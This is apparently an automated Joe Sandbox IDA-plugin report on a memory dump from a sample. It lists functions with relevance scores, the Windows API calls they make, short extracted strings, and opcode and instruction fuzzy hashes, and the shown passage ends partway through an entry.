Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: std::_$Facet_LockitLockit::_Register
String ID:
API String ID: 602326365-0
Opcode ID: 91050129db1ae73fc8cefc847d08cc2702a6f4c918226be4643e81f6a6d5deb0
Instruction ID: 19861b59e99db6ea35c39ea6518aacafd4ffa58aa40c31ad6d90b82de7b80d09
Opcode Fuzzy Hash: 91050129db1ae73fc8cefc847d08cc2702a6f4c918226be4643e81f6a6d5deb0
Instruction Fuzzy Hash: 458126716043058FCB14AA28D8D566E77D6AFB9324F24892EF889D7351C734CE868F92

Function 001A4EE0 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0019FC1A: GetLastError.KERNEL32(00000000,?,001A1F9D), ref: 0019FC1E
Part of subcall function 0019FC1A: SetLastError.KERNEL32(00000000,?,?,00000028,0019AC4F), ref: 0019FCC0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001A4F34
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001A4F7E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001A5044

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 290cf532130a36bb86977db6dd4862d2f7bf45d188c042ffe17899a964a5c6c3
Instruction ID: d26de12096276bf996dcd7edb9ff20a3c27f53d9a7260e203e5f71ca50d392db
Opcode Fuzzy Hash: 290cf532130a36bb86977db6dd4862d2f7bf45d188c042ffe17899a964a5c6c3
Instruction Fuzzy Hash: DF61BF75654A079FEB289F28CD82BBAB7A9FF16300F1041B9E905C6581F734D981DB90

Function 0019A62A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0019A722
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0019A72C
UnhandledExceptionFilter.KERNEL32(0019A2C0,?,?,?,?,?,?), ref: 0019A739

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: cb58144dd03fd2a0ff30ea4fabd4cf4519097a9318a0e82e1fd49a1090ab2b3d
Instruction ID: e72304f1566a75f4e9ffe17779ee2734d1fa7c6f804a85f86f0be421b4130347
Opcode Fuzzy Hash: cb58144dd03fd2a0ff30ea4fabd4cf4519097a9318a0e82e1fd49a1090ab2b3d
Instruction Fuzzy Hash: 8131C3759012289BCF21DF68DC89B9CBBB8BF18714F5042EAE41CA7250E7749F858F85

Function 00187420 Relevance: 4.4, Strings: 3, Instructions: 637COMMON

Download Yara Rule

Strings

NQAc, xrefs: 00187905
MQAc, xrefs: 00187648
NQAc, xrefs: 00187C1D

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: MQAc$NQAc$NQAc
API String ID: 0-726613130
Opcode ID: ea050642eaa057dbe7983441d300f54f2b4f4c7b2848d8a19e67b930b91e1ce3
Instruction ID: 153a766ee0cf7194205f0bd7c05614408ae9e43ead02b86c5ce846c5d42dbdae
Opcode Fuzzy Hash: ea050642eaa057dbe7983441d300f54f2b4f4c7b2848d8a19e67b930b91e1ce3
Instruction Fuzzy Hash: 6422F377B0C2148BCF24AA2884C426EB7D39BE5360F7B5956E858973D0D735CE858F82

Function 0017A8A0 Relevance: 4.1, Strings: 3, Instructions: 316COMMON

Download Yara Rule

Strings

lA[ , xrefs: 0017AB6E
lA[ , xrefs: 0017A904
lA[ , xrefs: 0017AC7B

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: lA[ $lA[ $lA[
API String ID: 0-3046995957
Opcode ID: 570be103142f4a27f7c395c24914a8c208be8644f7e2e41c251a82e9eccd8d20
Instruction ID: 5e3e0f5b5b8728685871db0536ab7d5e31dfec616bb4f1c329856991530a3751
Opcode Fuzzy Hash: 570be103142f4a27f7c395c24914a8c208be8644f7e2e41c251a82e9eccd8d20
Instruction Fuzzy Hash: 77A13B75A482018F5B288E18C89416E77F2DFFC354BAAD81AE58DCB354C734CC869B83

Function 0018B600 Relevance: 4.0, Strings: 3, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Strings

ios_base::failbit set, xrefs: 0018B8B3
ios_base::eofbit set, xrefs: 0018B7AF
ios_base::badbit set, xrefs: 0018B87F

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 0-1866435925
Opcode ID: 9572f3753e91d903ba2de543953938972b17d788e161e23707568e3d35e17821
Instruction ID: 9884c130721fa764d431f515c99aef6e2cf58f866da5a0b56e93f13136b181b4
Opcode Fuzzy Hash: 9572f3753e91d903ba2de543953938972b17d788e161e23707568e3d35e17821
Instruction Fuzzy Hash: 9051AB27F48624478E28A5294CC26BFB1C387D8324F27812ADCA5A73E4DB78DD434BC1

Function 00175670 Relevance: 4.0, Strings: 3, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

Strings

=s'a, xrefs: 0017572C
=s'a, xrefs: 00175736
=s'a, xrefs: 001757C0

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: =s'a$=s'a$=s'a
API String ID: 0-3308811078
Opcode ID: 3d7f9af25f6849820bd256b4c94a18a467f3eded7e352fee142a89e5ff266b41
Instruction ID: 206b8f343c07f3e3492856d47163ffdacca49c464acf062abfc6659d1845fb6d
Opcode Fuzzy Hash: 3d7f9af25f6849820bd256b4c94a18a467f3eded7e352fee142a89e5ff266b41
Instruction Fuzzy Hash: 6C517A36305B008FCB2C95389CE92BB77DB9B8A361F75C53DE80AC7290E3748D894611

Function 00179A30 Relevance: 3.9, Strings: 3, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

Strings

2dP7, xrefs: 00179A40
2dP7, xrefs: 00179B5C
2dP7, xrefs: 00179ACB

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: 2dP7$2dP7$2dP7
API String ID: 0-1671582929
Opcode ID: 216e5cce35ee86c9a347be8a10fce2b8e80e3bd7565f967ca09aa56f03dd83ed
Instruction ID: fe60642c2bcf31533260414ee95374d467ddf5c8d92b3a011f487206fa9fbbc2
Opcode Fuzzy Hash: 216e5cce35ee86c9a347be8a10fce2b8e80e3bd7565f967ca09aa56f03dd83ed
Instruction Fuzzy Hash: 9941F7357023119BD614CA3998D626E73F5BBD5350FA9C82AE45EC7260C729CC89D782

Function 00184740 Relevance: 3.4, Strings: 2, Instructions: 852COMMON

Download Yara Rule

Strings

l3U, xrefs: 00184B73
l3U, xrefs: 00184B53

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: l3U$l3U
API String ID: 0-3338743744
Opcode ID: b06c653df765e3a4737d5377153973649adc6273fd2bb1b719fce2e3561c216d
Instruction ID: 6f70e63bb878c39b012415c9729b0c67fdfccd2482b8337171b93070f7edd333
Opcode Fuzzy Hash: b06c653df765e3a4737d5377153973649adc6273fd2bb1b719fce2e3561c216d
Instruction Fuzzy Hash: 0E428A3B7106024FDB18993888A62FE37D2DBD6354F29C92ED855C7294EF29CD4A8F41

Function 00179280 Relevance: 2.7, Strings: 2, Instructions: 232COMMON

Download Yara Rule

Strings

m#5, xrefs: 001794EC
m#5, xrefs: 0017943B

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: m#5$m#5
API String ID: 0-3624771814
Opcode ID: ce105cc8a7fa5b7dec18c968851c3a87c1c342e6ffb2dc731391c23a0eaf4a75
Instruction ID: 679cfc1645a2be0c79f9f16fa8be55456a8c2134c211e50a176469cda38c4621
Opcode Fuzzy Hash: ce105cc8a7fa5b7dec18c968851c3a87c1c342e6ffb2dc731391c23a0eaf4a75
Instruction Fuzzy Hash: 6B71D5B6704316CFCA249E2985D829EB7F19B85344F26C52AE84EC7351D325DC8DCB83

Function 00177B30 Relevance: 2.7, Strings: 2, Instructions: 226COMMON

Download Yara Rule

Strings

KEM, xrefs: 00177DA4
KEM, xrefs: 00177C96

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: KEM$KEM
API String ID: 0-802700390
Opcode ID: e679cf8277c5855bd399ea99b58a9d7bde0a5b89deeccbc41d9fad2ca2690c24
Instruction ID: 8047dfc92c95a2e663130614b318eca81a736048c1b23d4bb4d7c28cfb3714ae
Opcode Fuzzy Hash: e679cf8277c5855bd399ea99b58a9d7bde0a5b89deeccbc41d9fad2ca2690c24
Instruction Fuzzy Hash: 3271D77A70C2418FC724CD2CD4846AEB7E2AFD5310F26D95AE898D7394D731DC458B82

Function 00173560 Relevance: 2.0, APIs: 1, Instructions: 519COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b4d6fe2ab4e17ec43783b01e00219c6307f3bfcaab692acbef9bc95a9536a3f
Instruction ID: 823d0a3dd8c0eccaaac9fcd7bd16b0d1517b5c836fdc134ac1f7fec16425b294
Opcode Fuzzy Hash: 7b4d6fe2ab4e17ec43783b01e00219c6307f3bfcaab692acbef9bc95a9536a3f
Instruction Fuzzy Hash: AB02BD756083008FCB18CE28C895B6E7BF2AB95394F14892DE8A9C7351D336DE45AB53

Function 0018CA60 Relevance: 1.9, APIs: 1, Instructions: 362COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0018CD90

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: c19a7f4647d560c135557dca2c1f85c3d6c5e5474a7efa42532b839e55ed8adb
Instruction ID: 4e46e104c6e192fa4e936390583661475b857a0e23b03134c8d2cab845e49318
Opcode Fuzzy Hash: c19a7f4647d560c135557dca2c1f85c3d6c5e5474a7efa42532b839e55ed8adb
Instruction Fuzzy Hash: 89C18732B016048BDF189A28D4A17EF7BE3AFD5350F29442AD846AB345DB359E458FA0

Function 001A92E9 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,03011369,?,00000008,?,?,001A9244,03011369,?,00000008,?,?,001AAEC3,00000000), ref: 001A9516

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 79a666bc6b7a054614ee517e3655a511267c80366a32042a510008d7479c958e
Instruction ID: c247150cc9f1efeec2f8674aeb0e078873170c08e1fd8b5c45232734501e1299
Opcode Fuzzy Hash: 79a666bc6b7a054614ee517e3655a511267c80366a32042a510008d7479c958e
Instruction Fuzzy Hash: 29B14F39510608DFDB19CF28C586B657BE0FF4A364F258659E8DACF2A1C735D982CB40

Function 00172DE0 Relevance: 1.8, Strings: 1, Instructions: 514COMMON

Download Yara Rule

Strings

d, xrefs: 00173041

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: b9b7f29285ee127098cd9d2303116aa51076d09e6e6c719ac60474b69022cb28
Instruction ID: 48610cab9ce52d5dbd6b7a4067a00844986c9dd192e158a420492fc1fcac780a
Opcode Fuzzy Hash: b9b7f29285ee127098cd9d2303116aa51076d09e6e6c719ac60474b69022cb28
Instruction Fuzzy Hash: 9CF14C7BB287004B975CCE69C89123EB6E2ABC8314F19D82EF59AC7350DF78CD415686

Function 001A5898 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001A0CC4: RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,0019FE5F,00000001,00000364,00000005,000000FF,?,00000000,?,00195765,00000000,25181615), ref: 001A0D05

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001A5A39
FindNextFileW.KERNEL32(00000000,?), ref: 001A5B2D
FindClose.KERNEL32(00000000), ref: 001A5B6C
FindClose.KERNEL32(00000000), ref: 001A5B9F

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: Find$CloseFile$AllocateFirstHeapNext
String ID:
API String ID: 4087847297-0
Opcode ID: f6744c57563ad4bc465784c889288a8b871ec268aa01feae5c2dea06ce6c2493
Instruction ID: 5ef99407ad9ef836bab81d1c4221e0d80d384323af921d60f77aa114584f4a06
Opcode Fuzzy Hash: f6744c57563ad4bc465784c889288a8b871ec268aa01feae5c2dea06ce6c2493
Instruction Fuzzy Hash: 02513779908618AFDF149F289C85ABF77BADF56328F1441ADF419DB201EB308D429B60

Function 0018BA20 Relevance: 1.7, APIs: 1, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0018BA5A

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 45ca256325a33b4b68bbe93b4eb6dd5bd688ef83d6784328a4e268b5635f6314
Instruction ID: 4f5bce0403f0bad547614581fb903a37ca8e5f0881455f36a0ac03e2ef9fa915
Opcode Fuzzy Hash: 45ca256325a33b4b68bbe93b4eb6dd5bd688ef83d6784328a4e268b5635f6314
Instruction Fuzzy Hash: CE5125357092019FDB18AE24C4D47AFBBE3ABC6350F19882DE8884B266D775DD448F92

Function 001910D6 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 001910EC

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 04247b8c6119e21bcf618d1fadfcaffc790045743e592e31132a106d32042b2d
Instruction ID: 60ebcb3a527626dee6e848146c0b23d9bd1d55a5051d5ece3461e9e7df0d200c
Opcode Fuzzy Hash: 04247b8c6119e21bcf618d1fadfcaffc790045743e592e31132a106d32042b2d
Instruction Fuzzy Hash: 63519271E11616EBEB25CFA4D9917AEBBF1FB48300F24812AC419EB250D374D980CB50

Function 001A51A0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0019FC1A: GetLastError.KERNEL32(00000000,?,001A1F9D), ref: 0019FC1E
Part of subcall function 0019FC1A: SetLastError.KERNEL32(00000000,?,?,00000028,0019AC4F), ref: 0019FCC0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001A51F4

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: b7a1c56dc7686758d6162fe43292e2adfb95c39860d5954f90479b5c6924dfac
Instruction ID: befbd1fecb0f94acc04915343df21cc530f23e27f8499e5edaeb29655650dc04
Opcode Fuzzy Hash: b7a1c56dc7686758d6162fe43292e2adfb95c39860d5954f90479b5c6924dfac
Instruction Fuzzy Hash: D5219276608606EBDF289A24DC42BBA77A9EF5A315B10407AFD02D7141EB39ED418B50

Function 001A52C0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

